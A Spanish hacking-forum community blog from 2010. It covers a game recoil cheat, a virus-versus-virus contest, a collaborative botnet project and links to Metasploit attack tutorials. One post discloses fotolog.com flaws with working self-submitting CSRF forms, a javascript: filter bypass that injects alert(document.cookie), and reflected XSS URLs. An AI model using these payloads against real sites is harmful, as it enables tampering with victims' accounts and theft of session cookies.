10 mayo 2010

[VB] No recoil Cheat V1.0 by *PsYkE1*

0 comentarios
*¿Qué es NRC?
Es un programa diseñado para reducir el recoil (el retroceso del arma) en tus juegos shooter favoritos.

*¿Como funciona?
Cada vez que presionas el mouse el cursor desciende ligeramente hacia abajo
, de este modo, mejora tu precisión a la hora de disparar.

*¿Para qué juego shooter esta pensado?
Principalmente para el Counter Strike, pero incluye la opcion de configurarlo para poder daptarlo a otros juegos.



Bueno, espero que seais críticos, y me deis vuestra opinión, cualquier sugerencia sera tomada en cuenta. ;)

Bueno, aquí os dejo el link:

28 abril 2010

Concurso Mayo: CoreWar by hendrix

0 comentarios
Dado que Abril Negro a fracasado estrepitosamente, propongo un nuevo concurso, del tipo CoreWar.

¿Que es un CoreWar?

Si nos atenemos a la definición de la Wikipedia, el CoreWar era una especie de juego informático en el que varios programas se disputaban el espacio de memoria o de disco de un computador. Logrando la victoria el programa que consiguiera abarcar más espacio, desbancando así a sus contrincantes.

Les dejo una definición que incluye algo de historia:

Citar
En 1939, el famoso científico matemático John Louis Von Neumann, de origen húngaro, escribió un artículo, publicado en una revista científica de New York, exponiendo su "Teoría y organización de autómatas complejos", donde presentaba la posibilidad de desarrollar pequeños programas que pudiesen tomar el control de otros, de similar estructura.

En 1949, en los laboratorios de la Bell Computer, subsidiaria de la AT&T, 3 jóvenes programadores: Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky, a manera de entretenimiento crearon un juego al que denominaron CoreWar, inspirados en la teoría de John Von Neumann.

El juego CoreWar fue desarrollado en Assembler Pnemónico, conocido como Red Code (código rojo) y hoy día es posible ejecutar dicho antiguo juego, por medio de un programa llamado MARS (Memory Array Redcode Simulator).

Puesto en la práctica, los contendores del CoreWar ejecutaban programas que iban paulatinamente disminuyendo la memoria del computador y el ganador era el que finalmente conseguía eliminarla totalmente. Este juego fue motivo de concursos en importantes centros de investigación como el de la Xerox en California y el Massachussets Technology Institute (MIT), entre otros.

Sin embargo durante muchos años el CoreWar fue mantenido en el anonimato, debido a que por aquellos años la computación era manejada por una pequeña élite de intelectuales.

Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky, fueron los autores del precursor de los virus informáticos.
Fuente: http://www.persystems.net/sosvirus/hackers/corewar.htm


CoreWar by elhacker.net

Ya que actualmente disponemos de maquinas mucho más potentes que las que vieron nacer CoreWar, propongo cambiar drásticamente las reglas del juego, adaptándolas a los virus y tecnologías actuales. Paso a explicar las reglas en los siguientes puntos:

  • Objetivos del Concurso:

    El objetivo principal del concurso es la de hacer un "mini-torneo" en el que los participantes, tendrán que diseñar códigos los cuales tendrán como único objetivo la eliminación total de su contrincante.


  • Posibilidades de infección:

    Como los virus actuales, los programadores podrán programar subrutinas de infección de discos (archivos, sistema de ficheros, etc.) y memoria (inyección de código en procesos externos, escritura/lectura de procesos del contrincante, etc.). Se permitirá tanto la programación en modo usuario y en modo Kernel.


  • Condiciones de victoria:

    Para que un programador obtenga la victoria tendrá que conseguir terminar completamente el proceso en modo usuario de su contrincante. Además de eso, tendrá que eliminar y/o desinfectar totalmente el sistema comprometido por el virus de su contrincante (descargar completamente el código del virus del contrincante de la memoria, desinfectar ficheros, etc.).

    El enfrentamiento será dividido en 2 rondas, para que cada virus pueda iniciarse primero que el otro (factor importante a la hora de atacar o defenderse).

    Obligatoriamente, el primer virus que se ejecute tiene que dejar ejecutar el otro.

    Si un enfrentamiento termina sin que los 2 virus consigan terminar el otro en ambas rondas o de lo contrario los 2 virus perezcan en cada ronda, se dará el enfrentamiento como nulo, tuviendose que reprogramar los virus y volverse a enfrentar.


  • Escenario de Batalla:

    El sistema operativo que se usará será una instalación limpia (sin ningún programa instalado, exceptuando programas como Filemon, ProcessExplorer y demás que servirán para seguir el enfrentamiento) de un Windows XP SP3 con las últimas actualizaciones.


  • Analizando el código:


    El virus constará básicamente de dos partes fundamentales, el modulo de defensa y el modulo de ataque. El modulo de defensa es el que se tiene que desarrollar primero y, 3 días antes del enfrentamiento, se entregará el ejecutable del virus con la parte de la defensa terminada al contrincante y viceversa. Los programadores podrán analizar el ejecutable en sus máquinas virtuales. Una vez analizado el virus, tendrán que programar el modulo de ataque, que será el que intentará desinfectar completamente el virus del contrincante. Se puede programar una defensa para cada enfrentamiento, una vez entregada al contrincante no se podrá modificar dicho módulo. Si alguno sospecha de que su contrincante ha modificado el modulo de defensa, se podrá requerir el código y se compilará, para ver que coincida con el ejecutable que se entregó la primera vez.

    Los programadores tienen que publicar en este post el nombre en disco de su virus (en proceso puede ser diferente, incluso aleatorio), el nombre del virus y para más información, el lenguaje en que fue creado. Ejemplo:

    Nombre en disco: Cryptovirus.exe
    Nombre del Virus: CryptoHendrix.A
    Lenguaje de programación usado: C + ASM.


    Al finalizar el concurso, y para que todo el mundo pueda aprender, se publicaran todos los códigos usados por cada programador en sus virus. Los recopilaré dentro de un único archivo comprimido.


  • Limitaciones:

    Los virus no podrán en ningún caso desestabilizar el sistema. Si se produce BSOD o reinicio/apagado forzoso del sistema o relentización excesiva de este, se dará el enfrentamiento como perdido para el virus que lo ocasione. El enfrentamiento tendrá lugar en una maquina virtual, se pueden infectar los archivos que les de la gana siempre y cuando no se desestabilice el sistema.

    Los virus no se podrán conectar a Internet, ya que no tiene mucha utilizad dentro de lo que es el concurso.




    Creo que no me dejo nada, si se hace algún cambio en las reglas se avisará. El inicio del torneo podría ser a mediados de Mayo, por ejemplo el Viernes 14 de Mayo. Del 1 de Mayo al 14 de Mayo se organizará el organigrama del torneo. El torneo será por eliminatorias (tipo Octavos de final, cuartos de final, semifinal y final). Los emparejamientos serán totalmente al azar. Si el numero de participantes es impar, uno de ellos automáticamente avanzará de ronda.

    Para apuntarse, déjenlo comentado en este post. En este primer post colocaré la lista de participantes y la iré actualizando según se anoten los concursantes. Cualquier duda, mejora o inclusión de alguna regla o lo que sea, comentenlo.

    PD: Me voy a anotar en este concurso, hace ya tiempo que no programo nada referente a malware y ya es hora :D aunque estaré condicionado del tiempo que tenga libre, ya que con la uni no tengo mucho :-\

    link:http://foro.elhacker.net/analisis_y_diseno_de_malware/concurso_mayo_corewar_apuntate-t291931.0.html;msg1445573
    Lista de participantes:

    • Hendrix

03 abril 2010

Proyecto Athena by Hacker_Zero

0 comentarios
Proyecto Athena


Athena será el nombre del Bot que realizaremos en éste post, un proyecto colaborativo en el que todo el mundo interesado podrá participar aportando código tanto en C como en ASM. El proyecto seguirá estrictamente las siguientes directrices:

  • El proyecto será OpenSource, el código se alojará en un repositorio al que todo el mundo podrá tener acceso, y al que los colaboradores podrán subir sus aportaciones.
  • Todas las posibles compilaciones del proyecto serán enviadas a empresas antivirus con el fin de que el Bot no pueda presentar ningún riesgo para la seguridad.
  • La finalidad del proyecto será única y exclusivamente el aprendizaje de técnicas usadas por Botnet's, intentando crear nuevos métodos y valorando la respuesta de las compañías antivirus.


Desarrollo

  • Se utilizará GoogleCode como repositorio, y Subversion como sistema de control de versiones.
  • Para solicitar ser colaborador del proyecto usen un Mensaje Privado
  • Todas las funciones deberán estar acompañadas de una documentación detallada.
  • Se podrán aportar tanto funciones programadas en ASM como en C/C++.

Colaboradores

-SecMAM
-RNA
-JaixxonJax
-Hacker_Zero
-biribau
-wisehacks

Links

Proyecto en GoogleCode
Código:
http://code.google.com/p/athenabot/

Wiki en GoogleCode
Código:
http://code.google.com/p/athenabot/wiki/AthenaBot

En fin, el proyecto es ese, no hay mucho que explicar, esta muy bien
explicado por hacker_zero pero si alguien quiere participar
este es otro medio para publicitarlo.


link al foro:http://foro.elhacker.net/analisis_y_diseno_de_malware/proyecto_athena-t289334.0.html


Abirl negro, bienvenido.

24 marzo 2010

Analisis y diseño de malware... [vacunas]

2 comentarios
El usuario DarkItachi , el día 24 marzo, se infectó ocn un virus, que esta mutando y lo que busca es que los usuarios que quieran, puedan tratar de encontrar la vacuna para este malware. Por ahora los usuarios comprometidos son:

Novlucker
skapunky
Hacker_Zero
seba123neo

Vamos a ver si ellos pueden con él.

DarkItachi: "Buenas, ayer me infecté con este virus y no se cómo, me destrozó el arranque de xp así que voy a proponeros un reto, crear un análisis y vacuna de este virus, que ha mutado, la información de internet no es del todo cierta ya que han cambiado nombre de procesos y tal, este reto va especialmente dedicado a Novlucker, viejo amigo que creó por una solicitud mía la vacuna del sasan.a, así que Novlucker y demás personas, tenéis un nuevo reto. Analizarlo y crear una vacuna, da igual el lenguaje. Es una forma de fomentar vuestros conocimientos. Mandadme mp y os mandaré el virus travieso comprimido en winrar con contraseña, anda que no costó reternelo xD. Buena suerte a todos :D.".

link al post:http://foro.elhacker.net/analisis_y_diseno_de_malware/antimalware_doctor_vacuna_y_analisis_reto-t288617.0.html

10 marzo 2010

Nuevo blog, blog oficial, sin competencias.

1 comentarios
Bueno gente, dando un poco de info, algo ya atrasado, pero mas vale decirlo que no nombrarlo, ya existe el blog oficial de la web elhacker.net, donde la idea era algo parecido a esto, pero no tan.

Aviso importante:No es nada de competencias, ni rivalidades, son cosas diferentes, aunque con nombre similar.

Se dió una discución acerca de si era autor a o no era auto del blog, cosa que no me afectaría y castg, dijo que como no iba a ser autor si la idea del blog fue creada (creo), por mi XD. Pero al fin y al cabo, si ellos no creian que tendria que ser necesario para el blog no había problema, y es más, lo dije que estaba todo bien!.

Pero sin embargo, no estoy en la lista del blog, pero internamente si lo soy autor. jaja, asique unas paginas del foro para al final darse cuenta de que SI soy autor, gracias por ello.

Solo falto en la lista, que tampoco influye mucho en mi.

Para los que quieran ver el blog oficial, muy fácil: http://blog.elhacker.net

La verdad que quedó muy bueno, muy buena plantilla, todo muy bueno y completo.

A los que querían entrevistas:La de anon se viene...

kamsky, pronto la propuesta.


Nuevamente: si quieren publicitar algo, dar informacion de algo o una entrada, comunicarse con:

fede_cp@elhacker.net



saludos!



saludos!

03 marzo 2010

Wallpapers, ¡Al ataque!.

0 comentarios
Como todos los meses (menos enero XD), se realiza la entrega de los wallpapapers hechos por los usuarios de elhacker.net. a continuacion los postulados:


Dimitrix:


Castg!:


Azielito:





Darioxhcx:


fede_cp:



janito:


madpitbull_99:



prometeo_diseño:




Acá estan los postulantes, el ganador Azielito, nada raro que él gane jaja.



link a la votación:
http://foro.elhacker.net/battle_arts/encuesta_wallpaper_marzo_2010-t286123.0.html


24 febrero 2010

Subforo de Ciencias Exactas

2 comentarios
Bueno, en estos ultimos dias, el tema de discucion en el foro era la creacion de un nuevo subforo sobre las ciencias exactas propuesto por el usuario final_frontier.
Muchos usuarios no pertenecientes al staff estaban completamente de acuerdo, aunque como siempre, la ultima palabra la tienen ellos, el staff. Siguiendo con un foro democratico se realizo porparte de sdc si no me equivoco, una votacion interna la cual resulto con 64.7% a la no creacion del mismo. El usuario apokliptico se quedo con las ganas diciendo de que lo seguira intentando.

Pero bueno, todavia se puede publicar sobre este tema en foro libre!, y no puede faltar la cita del comentario de anon que puede ser muy util para este tema:




Google Indexa a foro.elhacker.net en menos de 1 minuto te lo aseguro, si alguien quiere buscar como resolver integrales en foro.elhacker.net solo tiene que poner, en la búsqueda:

Código:
site:foro.elhacker.net resolver integrales
http://foro.elhacker.net/programacion_cc/ayuda_programa_para_integrales-t234538.0.html;msg1119829
http://foro.elhacker.net/foro_libre/obtener_una_integral_a_partir_del_resultado-t281288.0.html;msg1388172

Otros temas matemáticos

http://foro.elhacker.net/desafios_wargames/pi-t256765.0.html
http://foro.elhacker.net/programacion_general/lenguaje_para_matematicas-t214905.0.html;msg1053766
http://foro.elhacker.net/foro_libre/mates_problemas_con_numeros_grandes_y_programas_interesantes-t186388.0.html
http://foro.elhacker.net/foro_libre/iquestcoleccion_de_preguntas_matematicas_o_paginas_web_de_mate-t270093.0.html
http://foro.elhacker.net/desafios_wargames/otro_de_matematicas-t154527.0.html;msg727868
http://foro.elhacker.net/foro_libre/problema_de_combinatoria_matematicas-t264897.0.html;msg1294821
http://foro.elhacker.net/foro_libre/hilo_de_ciencias_matematicas_etc-t173128.0.html
http://foro.elhacker.net/desafios_wargames/acertijo_de_matematicas-t173194.0.html
http://foro.elhacker.net/criptografia/preguntas_sobre_rsa_matematicas-t183043.0.html

Temas de Fisica y otros

http://foro.elhacker.net/foro_libre/iquestalgun_estudiante_de_fisica_en_el_foro-t271557.0.html;msg1348397
http://foro.elhacker.net/desafios_wargames/fisica_problema-t191256.0.html
http://foro.elhacker.net/foro_libre/ingenieria_informatica_mi_sueno-t270231.225.html
http://foro.elhacker.net/foro_libre/nueva_forma_de_generar_electricidad_sin_contaminar-t147026.0.html;msg693936

Es cierto no hay muchos temas, igual me da si se crea el subforo o no, si se crea yo estaré ahi, ya que los temas estarán concentrados en un solo lugar.

Saludos




Esto es todo. Pero la verdad, pienso un poco como el staff, ya esta el foro libre y se puede usar el mismo ramal. lo unico que no me gustó, fue el decir que las ciencias exactas no se relacionan con la informatica en eso no estoy de acuerdo, ustedes?

un saludo grande, castg.

14 febrero 2010

Abril negro... a prepararse!

4 comentarios
Como todos los años, pronto (1 mes y medio), va a comenzar el famoso mes "abril negro", donde todos, vamos a poder "Lammerear", presentar programas fueras de las normas para "juankear", como siempre esto tiene una explicación... Aquellos que quieran presentar una herramienta y no se acordaron de abril negro, es la fecha perfecta para empezar a crear algo y presentarlo en el foro, asique no creo que este de mas una aviso...
Aparte cabe recordar que el usuario 50l3r va a presentar la version de Dioxis 5.1, que ya se adelanto y la tiene lista para el abril negro.

Aviso:el que quiera dar una sugerencia al blog, si le gusta o quiere formar parte agregar(msn) o directamente PUBLICITAR algo que fue puesto en el foro avisar a fede_cp@elhacker.net.

saludos!

12 febrero 2010

Adios navidad!

2 comentarios
Y como era de esperar por los usuarios de elhacker, ya se fue el logo de elhacker nevado y con el gorrito de navidad y todos los iconos de navidad ¡Al fin!, ya era necesaria una modificación, ahora se esta dando la propuesta, para que sean fantasmitas, asique si alguien tiene ganas de hacer algun prototipo de fantasmin, que lo postee en el foro:

elbrujo:
"
¿qué tal un set de fantasmitas? :laugh:

Los actuales smilies de Chef se eligieron por votación del staff y yo no voté.

Las opciones eran:

Classic


Calabazas


Babys


Afro


Chef


Cowboy


Militares


"

y claro al staff le gusto mas el cheff


link al foro: http://foro.elhacker.net/battle_arts/emoticones_de_el_foro-t284200.0.html



saludos!

edito castg.........

El brujo habló, Castg respondió.

bueno, quiero agregar los iconos que hice. el brujo habia dicho unos iconos de fantasmitas, y empece a trabajar. no quedaron de lo mejor, pero quedaron xD!

aca los finales, creados por mi, pero no se todavia se si van a utilizar o no ya que el-brujo esta sin internet :s...




bueno y que decis brujo? tenemos con esto otros estilos de emoticones para el foro?

un saludo grande, Castg!

07 febrero 2010

Castg, fede_cp, fotolog, una lucha!

0 comentarios
Post realizado por castg...

[
Bueno bueno, que mas, les voy a contar TODO! porque quiero un post bien larguito xD!

Empiezo, estaba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog (aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache y se podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa ;-)) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "‭‬javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

Código
<body onload="document.update_prefs.submit()">
<form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
<input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
<input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
<input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
<input type="hidden" id="image" name="image" class="lg">
<input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
<input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
<input type="hidden" class="radio" name="gender" id="g_0" value="0">
<input type="hidden" class="radio" name="gender" id="g_1" value="1">
<input type="hidden" class="radio" name="gender" id="g_2" value="2">
<input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
<input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
<input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:plink:0">
<input type="hidden" class="checkbox" name="delete:new:plink:1">
<input type="hidden" name="new:plink:1" value="1">
<input type="hidden" id="country" name="country" value="_N">
<input type="hidden" id="state" name="state" value="00">
<input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
<input type="hidden" name="language" value="tr">
<input type="hidden" name="new:camera:0:type" value="3">
<input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
<input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
<input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
<input type="hidden" type="checkbox" name="delete:new:camera:0">
<input type="hidden" name="new:camera:0" value="1">
<input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
<input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
<input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
<input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
<input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:favlink:0">
<input type="hidden" name="new:favlink:0" value="1">
</form>
</body>

2do formulario: (este modifica los colores y titulo...)

<body onload="document.update_prefs.submit()">

<form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="title" value="Me cabieron el pote!">
<input type="hidden" name="margin_txt_color" value="FFFFFF">
<input type="hidden" name="margin_link_color" value="33FF00">
<input type="hidden" name="margin_bg_color" value="FFFF00">
<input type="hidden" name="text_color" value="FFFFFF">
<input type="hidden" name="hyperlink_text_color" value="FFFF00">
<input type="hidden" name="background_color" value="FFFF00">
</form>
</body>
3er formulario: (noticias por mail... "newlestter")
<body onload="document.update_prefs.submit()">

<form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
<input type="hidden" name="receive_email_digest" value="true">
<input type="hidden" name="receive_updates" value="true">
<input type="hidden" name="receive_newsletter" value="true">
<input type="hidden" name="receive_promotionals" value="true">
</form>
</body>



Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen ‭‬javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el ‭‬javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".



XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E


]


Link!:http://foro.elhacker.net/nivel_web/fedecp_y_castg_simple_disclosure_de_fotologcom_xd-t283719.0.html;msg1400445#msg1400445

02 febrero 2010

Algunos posts acerca de Metasploit framework!

0 comentarios
Bueno gente, aca van todos los tutoriales que pude encontre de metasploit en el foro: van con autor, del post!, no necesariamente del tutorial

Karmetasploit


Explicación:

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

Autor:Shell Root y trashhgoo

link:http://foro.elhacker.net/hacking_avanzado/metasploit_karmetasploit-t280195.0.html


Java Applet Infection

Excplicación:

Está infección permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos.

Autor: Shell Root

link:http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection-t281594.0.html


Habilitar Escritorio Remoto


Explicación:

Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger, Screenshot, Ver Escritorio Remoto ). Tambien podemos agregar un usuario y habilitar el escritorio remoto de la P.C Remota con tan solo una ejecucion de un comando. Aquí veremos el uso de esté servicio del Metasploit.

Autor:Shell Root

link:http://foro.elhacker.net/hacking_avanzado/metasploit_habilitar_escritorio_remoto-t278825.0.html

[Metasploit + 0-day IE] Exploit IE_Aurora

Explicación: Ejecución de un exploit 0-day en IE con la utilizacion de metasploit.

Autor: Shell Root

link: http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html


[Metasploit] Infectando Linux con Troyano

Explicación:Es infectado con un troyano linux 9.10, con un exploit lanzando desde metasploit

Autor:Shell Root

Link:http://foro.elhacker.net/hacking_avanzado/metasploit_infectando_linux_con_troyano-t281967.0.html


Generando Ejecutable con PAYLOAD

Explicación:

Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la victima ejecute un archivo Ejecutable.

Autor:Shell Root

Link: http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html


Suplantación de Usuarios

Autor:Shell Root

Link:http://foro.elhacker.net/hacking_avanzado/metasploit_suplantacion_de_usuarios-t279100.0.html


Estos son algunos de los tutoriales que hay en el foro, pero como se puede notar, Shell Root es uno de los creadores de muchos, asique bien por eso!

Faltan algunos pero estos los considere como mas actualizados que otros.


saludos!


fede_cp

28 enero 2010

Entrevista a el-brujo gente!

1 comentarios
Bueno, la tenía tan prometida a la comunidad que cómo no la iba a poner en mi blog, aca pude lograr la entrevista gracias a la buena onda de el-brujo, aqui vamos!!.

Bueno brujo, ya casi todos los users de esto foro sabemos que sos el administrador de este foro, conocido mundialmente, donde lo integran personas de todo el mundo, y aportan día a día, preguntas, enseñan lo que saben, lo comparten y asi vamos uniendo entre todos los conocimientos y aprendiendo unos de otros, que es lo que tiene este espectacular foro.

A todo esto era imprecindible, una entrevista:

1. Primero que nada ¿Quien sos?

Tengo ya 29 años, pero mentalmente muchos menos, vivo (en casa de mis padres) y trabajo en Barcelona y tengo una gata de 6 años con de casi 5 kg, me gustan los deportes, juego a fútbol sala, y especialmente adoro el mundo del motor off-road.


2.¿Cómo fue que se te ocurrió crear el foro, fuiste vos solo desde un principio?

El foro era simplemente una sección más de la web, pero con el tiempo es la parte que ha tenido más éxito con diferencia. Casi todas las webs tienen un foro y por eso se creó. Instalé el foro, pero desde el principio hasta ahora siempre he tenido varios moderadores ayudando.


3.¿Creiste alguna vez, desde un principio, que el foro podía llegar a ser lo que es hoy?

No es que no lo esperara, es que no lo buscaba, simplemente pasó y no pensaba en más adelante. Era un foro, pero en poco tiempo (1-2 años) tuvo relativo éxito y las visitas fueron subiendo progresivamente, de 50 visitas diarias hasta la actualidad.


4. ¿Crees que el foro pudo haber crecido porque antes no habia tantos foros como los que hoy en día hay, y ya hoy hacer un foro con "competencia a este" con la misma calidad, es casi imposible?.

No es imposible, la clave es tener mucha paciencia, suerte, ayuda, constancia y no tener excesivas pretensiones económicas. Yo no me planteo crear un foro para ganar dinero por internet. Han existido foros mucho mejores que éste, pero la mayoría han desaparecido o han sido "abandonados" con el tiempo.


5. Si te digo que elijas las 3 mejores cosas, por las cuales estas contento de haber creado el foro ¿cuáles serían?

(no ordenadas)

1. Popularidad en internet del foro (relativo éxito de visitas)
2. Mantener el espíritu de todo foro, ayudar y ser ayudado, hoy por mí, mañana por tí sin enfocarlo como un negocio.
3. Encontrar tantos colaboradores y moderadores que ayudan.


6. ¿A que te dedicas, tenes hijos, cuanto tiempo le dedicas al foro en el día de hoy?

Trabajo de informático, pero nada relacionado con la seguridad, no estoy casado, ni tengo hijos, estoy soltero porque ninguna chica me aguantaría (informática y motor no gustan en general a las chicas).

Tengo la gran suerte que el horario de mi trabajo me permite casi siempre dedicarle varias horas al foro diariamente.


7. Si tenes que agradecer a algun usuario-moderador-co-admin a quien seria?

A todos en general, aunque en especial antes a Rojodos y ahora a Sirdarckcat. Todos los CoAdmins son excelentes personas y de absoluta confianza.


8. ¿Cambió algo de tu vida el foro. En qué?

Si, a no dejar siempre las cosas siempre a medias. Una mala costumbre es hacer algo que me gusta durante un largo tiempo y luego olvidarla por completo. Siendo una persona muy impaciente, creo que ha sido lo único que he mantenido desde el año 2001.


9. ¿Si tendrías algo que decir a todos los usuarios del foro elhacker.net, que sería?.

Nada en especial, pero simplemente que sepan o se sientan que realmente forman parte de una comunidad (aunque yo antes era muy partidario de esta palabra).

Gracias brujo por la buena onda y la paciencia!!

Las famosas entrevistas [Número 4]!

0 comentarios
Editor: WHK
Esta entrevista duró un poco mas de 4 días debido a que nanonroses es una persona muy ocupada pero después de tanto tocar la puerta de su oficina logré obtener la entrevista que necesitaba :p, a nanonroses lo conocí hace un par de años cuando iba a new-bytes, el era uno de los administradores aunque de todas formas siempre lo miraba como un amigo mas que nada ya que el también es Chileno.

Entrevista
Tuve un problema con mi celular, no funcionaba y en la pantalla se lograba ver una pequeña calavera que decía "Owned by Telefónica" así que tuve la obligación de llamar al servicio técnico. Después de un par de minutos llegó y rápidamente me solucionó el problema y pensé "talvez pueda darme una entrevista" y tomando lápiz y papel le pedí 10 minutos de su tiempo:
\\\WHK/// dice:
Hola, que tal. ¿Puedes decirnos por favor quien eres?
.:: NaNo N RoSeS ::. dice:
Buenas, mi nick es NaNoNRoSes usuario activo de la red de redes.....Internet
\\\WHK/// dice:
¿A que te dedicas actualmente o cual es tu pasión?
.:: NaNo N RoSeS ::. dice:
me dedico a la conectividad de redes, soy CCNA y toy terminando mi CCNP de Cisco System. Mi pasion es la convergencia de multiple protocolo y enrutameintos de éstas para optimizar redes y obviamente maximizar la utilizacion de Internet y de redes coporativas.
\\\WHK/// dice:
como ves el mundo de internet hoy en dia? crees que falte mucho para la migración total hacia IPV6?
.:: NaNo N RoSeS ::. dice:
El mundo de Internet crece de forma exponencial y por ende la migracion de IPV6 la veo a la "vuelta de la esquina", pienso que unos 2 años mas vamos a tener con mas fuerza y penetracion este nuevo concepto.
.:: NaNo N RoSeS ::. dice:
las direcciones IP estan escazeado y por ende esta migracion es necesaria
\\\WHK/// dice:
Cuando alguien habla de DNS Poisoning, de quien es la culpa, del administrador del servidor o del proveedor que asigna la red? a quien debemos recurrir?
.:: NaNo N RoSeS ::. dice:
Bueno hace poco vimos que Dam Kaminsky indico un fallo de diseño de este protocolo por lo que nuestros proveedores tuvieron que hacerce cargo de dicha falla, pero si lo vemos a nivel local los administradores de Red no saben que es un DNS Poisoning o Pharming y por consiguiente no saben como actuar frente a este tipo de ataque, me ha tocado ver personas (Administradores de Redes)
.:: NaNo N RoSeS ::. dice:
Que en un DNS de Windows 2003 server desabilitan la opcion de "Asegurar cache contra corrupción" por que me han dicho que no quieren ocupar cache, entonces vemos que hay adminsitradores que no saben de Seguridad y que no saben de conceptos, pero no los culpo a ellos sino a la formacion que estos tienen, es como lo que pasa con los programadores (no todos) que programan pero que seguridad no tiene nada.
\\\WHK/// dice:
¿Cual crees que sea el futuro de Internet, crees que todabía seguiremos con el TCP/IP o hay algo que se planee?
.:: NaNo N RoSeS ::. dice:
Creo que el futuro de Internet está en tecnologías más inteligente y eficiente, como por ej. Medios de transmisión más eficaces y con tecnología que ayuden a dichos medios a utilizar el canal de dato de forma más eficiente. Hacer un cambio radical de tecnologías de medio físico es muy costoso, por lo que esto tiene que ser de forma gradual.
Con respecto a la Tecnología IP como sabemos es el pilar de Internet, la mayoría de las redes usan esta forma de conmutar paquetes. Pero por otro lado vemos tecnologías nuevas como por ej. MPLS, este tipo de conmutación es más eficiente que IP, ya que la forma de trabajar es que añade una Etiqueta a la Trama y se lee solo a base de la Etiqueta y no de su "Payload" a diferencia de IP que no es orientado a conexión y que por ende no tiene QoS, sumado a esto es que cada salto (entiéndase por router) de una trama en IP es conmutada por el Router/Encaminador aplicándole su algoritmo de Tabla de Enrutamiento según sea la tecnología que ocupa, entonces es menos eficiente que MPLS.
